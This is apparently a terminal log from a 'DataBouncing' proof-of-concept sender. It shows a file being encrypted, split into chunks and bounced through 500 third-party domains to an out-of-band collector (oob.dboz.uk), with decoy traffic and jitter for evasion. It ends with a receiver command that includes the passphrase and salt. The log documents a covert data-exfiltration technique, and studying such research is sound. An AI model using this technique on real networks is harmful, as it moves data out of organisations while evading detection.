
  ██████╗ ██████╗ ██████╗  ██████╗  ███████╗███████╗███╗  ██╗██████╗
  ██╔══██╗██╔══██╗╚════██╗██╔════╝  ██╔════╝██╔════╝████╗ ██║██╔══██╗
  ██║  ██║██████╔╝ █████╔╝███████╗  ███████╗█████╗  ██╔██╗██║██║  ██║
  ██║  ██║██╔══██╗██╔═══╝ ██╔═══██╗ ╚════██║██╔══╝  ██║╚████║██║  ██║
  ██████╔╝██████╔╝███████╗╚██████╔╝ ███████║███████╗██║ ╚███║██████╔╝
  ╚═════╝ ╚═════╝ ╚══════╝ ╚═════╝  ╚══════╝╚══════╝╚═╝  ╚══╝╚═════╝
  DataBouncing Sender

  Session key:    Argon2id derived
  Field lengths:  fileID=5, seq=6, total=11
  Salt:           e2dfd671d22143c815f143befbf2a91b

  Input:          /root/db26/poc/message.txt (554 bytes)
  Encrypted:      582 bytes
  FileID:         e1ba
  Chunks:         25 × 25 bytes max

  Candidates:     500 domains, 500 channels
  OOB domains:    [oob.dboz.uk]
  Retries:        10x per chunk
  Decoy rate:     20%
  Jitter:         20-100ms

  Sending 25 chunks × 10 retries = 250 requests

  [50/250] 20% at 5/s | errors: 0  [100/250] 40% at 2/s | errors: 0  [150/250] 60% at 2/s | errors: 0  [200/250] 80% at 1/s | errors: 0  [250/250] 100% at 1/s | errors: 0

  ════════════════════════════════════════
  Send Complete
  ════════════════════════════════════════
  File:       /root/db26/poc/message.txt (554 bytes)
  FileID:     e1ba
  Chunks:     25 (sent 250 total with retries)
  Errors:     0
  Duration:   3m32s
  Salt:       e2dfd671d22143c815f143befbf2a91b
  Checksum:   af850616b64645e361c255740ac50c63e1ac1c65105810b3bb8cf31d7dbd76b8
  ════════════════════════════════════════

  Receiver command:
  db26-recv -passphrase "db26-poc-databouncing" \
    -salt e2dfd671d22143c815f143befbf2a91b \
    -corr-ids d6vcfg5mnc365rcfofp0tq1iaargqao8b \
    -oob-domains oob.dboz.uk \
    -file-id e1ba
